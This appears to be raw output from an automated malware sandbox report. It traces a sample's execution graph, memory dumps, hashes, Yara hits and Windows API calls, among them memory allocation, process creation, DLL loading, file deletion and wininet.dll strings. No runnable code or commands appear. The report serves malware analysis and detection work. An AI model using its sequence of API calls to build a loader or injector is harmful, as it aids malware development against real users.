                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                                                                                          • Opcode ID: e8396b40327642887e4e751947376ca685368fb6f601422bc3f4b9683a233792
                                                                                                                                                                                                          • Instruction ID: 31cef651dcab294f4f76408af6cce367ae088f75dffa02c2d8805af70623655a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8396b40327642887e4e751947376ca685368fb6f601422bc3f4b9683a233792
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC810A71D0026ADBDB358B54CD44BEEB7B4BB48754F0441EBAA19BB290D7709E84CFA0

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                                                                                          Signature Coverage:2.3%
                                                                                                                                                                                                          Total number of Nodes:443
                                                                                                                                                                                                          Total number of Limit Nodes:73
95315 2c27d10 95316 2c27d79 95315->95316 95318 2c27d31 95315->95318 95317 2c27d8f NtDeleteFile 95316->95317 94970 3452ad0 LdrInitializeThunk 94971 2c09460 94972 2c09942 94971->94972 94974 2c09ef8 94972->94974 94975 2c29920 94972->94975 94976 2c29943 94975->94976 94981 2c03db0 94976->94981 94978 2c2994f 94979 2c2997d 94978->94979 94984 2c243e0 94978->94984 94979->94974 94988 2c12f10 94981->94988 94983 2c03dbd 94983->94978 94985 2c2443a 94984->94985 94987 2c24447 94985->94987 94999 2c113a0 94985->94999 94987->94979 94989 2c12f27 94988->94989 94991 2c12f40 94989->94991 94992 2c28800 94989->94992 94991->94983 94993 2c28818 94992->94993 94994 2c2883c 94993->94994 94995 2c28891 94993->94995 94996 2c27420 LdrInitializeThunk 94993->94996 94994->94991 94997 2c29c80 RtlFreeHeap 94995->94997 94996->94995 94998 2c288a6 94997->94998 94998->94991 95000 2c113db 94999->95000 95015 2c17650 95000->95015 95002 2c113e3 95003 2c29d60 RtlAllocateHeap 95002->95003 95013 2c116b2 95002->95013 95004 2c113f9 95003->95004 95005 2c29d60 RtlAllocateHeap 95004->95005 95006 2c1140a 95005->95006 95007 2c29d60 RtlAllocateHeap 95006->95007 95008 2c1141b 95007->95008 95014 2c114ae 95008->95014 95030 2c16460 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95008->95030 95010 2c141e0 LdrLoadDll 95011 2c1166f 95010->95011 95026 2c26b00 95011->95026 95013->94987 95014->95010 95016 2c1767c 95015->95016 95031 2c17540 95016->95031 95019 2c176c1 95021 2c176dd 95019->95021 95024 2c27da0 NtClose 95019->95024 95020 2c176a9 95022 2c176b4 95020->95022 95023 2c27da0 NtClose 95020->95023 95021->95002 95022->95002 95023->95022 95025 2c176d3 95024->95025 95025->95002 95027 2c26b5a 95026->95027 95029 2c26b67 95027->95029 95042 2c116d0 95027->95042 95029->95013 95030->95014 95032 2c1755a 95031->95032 95036 2c17636 95031->95036 95037 2c274c0 95032->95037 95035 2c27da0 NtClose 95035->95036 95036->95019 95036->95020 95038 2c274dd 95037->95038 95041 34535c0 LdrInitializeThunk 95038->95041 95039 2c1762a 
95039->95035 95041->95039 95045 2c116f0 95042->95045 95058 2c17920 95042->95058 95044 2c11bd5 95044->95029 95045->95044 95062 2c20580 95045->95062 95048 2c118f1 95049 2c2ae90 2 API calls 95048->95049 95052 2c11906 95049->95052 95050 2c1174e 95050->95044 95065 2c2ad60 95050->95065 95051 2c178c0 LdrInitializeThunk 95054 2c11931 95051->95054 95052->95054 95070 2c10360 95052->95070 95054->95044 95054->95051 95055 2c10360 LdrInitializeThunk 95054->95055 95055->95054 95056 2c11a5f 95056->95054 95057 2c178c0 LdrInitializeThunk 95056->95057 95057->95056 95059 2c1792d 95058->95059 95060 2c17955 95059->95060 95061 2c1794e SetErrorMode 95059->95061 95060->95045 95061->95060 95074 2c29bf0 95062->95074 95064 2c205a1 95064->95050 95066 2c2ad70 95065->95066 95067 2c2ad76 95065->95067 95066->95048 95068 2c29d60 RtlAllocateHeap 95067->95068 95069 2c2ad9c 95068->95069 95069->95048 95071 2c1037c 95070->95071 95081 2c28020 95071->95081 95077 2c27f00 95074->95077 95076 2c29c21 95076->95064 95078 2c27f8a 95077->95078 95080 2c27f24 95077->95080 95079 2c27fa0 NtAllocateVirtualMemory 95078->95079 95079->95076 95080->95076 95082 2c2803a 95081->95082 95085 3452c70 LdrInitializeThunk 95082->95085 95083 2c10382 95083->95056 95085->95083 95319 2c0b1a0 95320 2c29bf0 NtAllocateVirtualMemory 95319->95320 95321 2c0c811 95319->95321 95320->95321 95086 2c1ece0 95087 2c1ed44 95086->95087 95115 2c15d00 95087->95115 95089 2c1ee74 95090 2c1ee6d 95090->95089 95122 2c15e10 95090->95122 95092 2c1f013 95093 2c1eef0 95093->95092 95094 2c1f022 95093->95094 95126 2c1eac0 95093->95126 95095 2c27da0 NtClose 95094->95095 95097 2c1f02c 95095->95097 95098 2c1ef25 95098->95094 95099 2c1ef30 95098->95099 95100 2c29d60 RtlAllocateHeap 95099->95100 95101 2c1ef59 95100->95101 95102 2c1ef62 95101->95102 95103 2c1ef78 95101->95103 95104 2c27da0 NtClose 95102->95104 95135 2c1e9b0 CoInitialize 95103->95135 95106 2c1ef6c 95104->95106 95107 2c1ef86 95137 2c27880 95107->95137 95109 2c1f002 95110 2c27da0 NtClose 95109->95110 
95111 2c1f00c 95110->95111 95112 2c29c80 RtlFreeHeap 95111->95112 95112->95092 95113 2c1efa4 95113->95109 95114 2c27880 LdrInitializeThunk 95113->95114 95114->95113 95116 2c15d33 95115->95116 95117 2c15d57 95116->95117 95141 2c27930 95116->95141 95117->95090 95119 2c15d7a 95119->95117 95120 2c27da0 NtClose 95119->95120 95121 2c15dfa 95120->95121 95121->95090 95123 2c15e35 95122->95123 95146 2c27710 95123->95146 95127 2c1eadc 95126->95127 95128 2c141e0 LdrLoadDll 95127->95128 95130 2c1eafa 95128->95130 95129 2c1eb03 95129->95098 95130->95129 95131 2c141e0 LdrLoadDll 95130->95131 95132 2c1ebce 95131->95132 95133 2c141e0 LdrLoadDll 95132->95133 95134 2c1ec28 95132->95134 95133->95134 95134->95098 95136 2c1ea15 95135->95136 95136->95107 95138 2c2789d 95137->95138 95151 3452ba0 LdrInitializeThunk 95138->95151 95139 2c278cd 95139->95113 95142 2c2794a 95141->95142 95145 3452ca0 LdrInitializeThunk 95142->95145 95143 2c27976 95143->95119 95145->95143 95147 2c2772a 95146->95147 95150 3452c60 LdrInitializeThunk 95147->95150 95148 2c15ea9 95148->95093 95150->95148 95151->95139 95152 2c107e0 95153 2c107fa 95152->95153 95154 2c141e0 LdrLoadDll 95153->95154 95155 2c10818 95154->95155 95156 2c1085d 95155->95156 95157 2c1084c PostThreadMessageW 95155->95157 95157->95156 95322 2c27c20 95323 2c27cbc 95322->95323 95325 2c27c44 95322->95325 95324 2c27cd2 NtReadFile 95323->95324 95326 2c24da0 95327 2c24dfa 95326->95327 95329 2c24e07 95327->95329 95330 2c22930 95327->95330 95331 2c29bf0 NtAllocateVirtualMemory 95330->95331 95332 2c22971 95331->95332 95333 2c141e0 LdrLoadDll 95332->95333 95335 2c22a76 95332->95335 95336 2c229b7 95333->95336 95334 2c229f0 Sleep 95334->95336 95335->95329 95336->95334 95336->95335 95160 2c17f71 95161 2c17ef2 95160->95161 95162 2c17f76 95160->95162 95162->95161 95164 2c169d0 LdrInitializeThunk LdrInitializeThunk 95162->95164 95164->95161 95165 2c16df0 95166 2c16db4 95165->95166 95167 2c16df7 95165->95167 95168 2c1a960 9 API calls 95166->95168 95169 2c16dc2 
95168->95169 95337 2c167b0 95338 2c167da 95337->95338 95341 2c176f0 95338->95341 95340 2c16804 95342 2c1770d 95341->95342 95348 2c27510 95342->95348 95344 2c1775d 95345 2c17764 95344->95345 95346 2c275e0 LdrInitializeThunk 95344->95346 95345->95340 95347 2c1778d 95346->95347 95347->95340 95349 2c27531 95348->95349 95350 2c2759d 95348->95350 95349->95344 95353 3452f30 LdrInitializeThunk 95350->95353 95351 2c275d6 95351->95344 95353->95351 95170 2c27270 95171 2c272f4 95170->95171 95172 2c27294 95170->95172 95175 3452ee0 LdrInitializeThunk 95171->95175 95173 2c27325 95175->95173 95177 2c12477 95178 2c15d00 2 API calls 95177->95178 95179 2c124a3 95178->95179 95180 2c1937b 95181 2c1938a 95180->95181 95182 2c19391 95181->95182 95183 2c29c80 RtlFreeHeap 95181->95183 95183->95182

Control-flow Graph (basic blocks starting at 2c09460; legend: Executed / Not Executed)
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: L$!e$'$)~$*z$.,$0$3$6$7$8=$:$:^$?$C$ExK$I%$My$O$P5$V$Z$\$^^$b$c$h*$n$nr$r6$s|$t$x$z}$|#$}:$1$B$K$X
                                                                                                                                                                                                          • API String ID: 0-580166099
                                                                                                                                                                                                          • Opcode ID: 84956fa25fbd526bcff2ace8aa58ce7ff2863ea4e3ca17b2e7c2ba4531c05971
                                                                                                                                                                                                          • Instruction ID: 81bfcb972330a34ee67664f551cf722b065bd33d816afbc649a69ce77813a394
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84956fa25fbd526bcff2ace8aa58ce7ff2863ea4e3ca17b2e7c2ba4531c05971
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D452A9B0D05669CBEB24CF45C998BDDBBB2BB85308F1081D9C10D6B291D7B91AC9CF81
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C1BCE4
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,00000010), ref: 02C1BD1F
                                                                                                                                                                                                          • FindClose.KERNELBASE(?), ref: 02C1BD2A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                                                                          • Opcode ID: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                                                                                          • Instruction ID: 8bab3e18b1bc4bdf3a8aa863d789065b06a5d0d92e8e462182cea5281c1eb890
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC3172B19006487BDB20EF60CC85FFF777CDB85708F144498B949A7184DBB0AA84AFA0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02C27BB3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                                                                                                                                                                                                          • Instruction ID: 7e8a7ed0eddccd9d703d1141351e89ee133208c21b86af8b79a546e09f2abbc8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6331EEB5A00658AFCB14DF98D880EEEB7F9EF8C714F108219F919A7344D770A8058FA5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02C27CFB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                          • Opcode ID: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                                                                                          • Instruction ID: ae578309f9fb3a9de934ba15ac4199ea3e68683d4aea0bd355dbbc4363174a41
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8431E3B5A00618AFDB14DF99D880EEFB7F9EF88314F108219F909A7344D774A8158FA5
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtAllocateVirtualMemory.NTDLL(02C1174E,?,02C26B67,00000000,00000004,00003000,?,?,?,?,?,02C26B67,02C1174E,02C29C21,02C26B67,104D8B00), ref: 02C27FBD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2167126740-0
                                                                                                                                                                                                          • Opcode ID: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                                                                                          • Instruction ID: 4bffd4dea8962f448e635bd660e0589b65fcd57d3284df10b38be3164bbee175
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F32127B5A00659AFDB10DF98DC80FAFB7A9EF88300F108209FD09A7244D774A8158FA1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DeleteFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4033686569-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C27DD7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3535843008-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 02C10857
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 02C10857
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02C229FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02C1E9C7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                          • String ID: @J7<
                                                                                                                                                                                                          • API String ID: 2538663250-2016760708
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02C1E9C7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                          • String ID: @J7<
                                                                                                                                                                                                          • API String ID: 2538663250-2016760708
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C14252
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C17AD3,00000010,?,?,?,00000044,?,00000010,02C17AD3,?,?,?), ref: 02C28203
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02C116F0,02C26B67,02C24447,?), ref: 02C17953
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09445
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
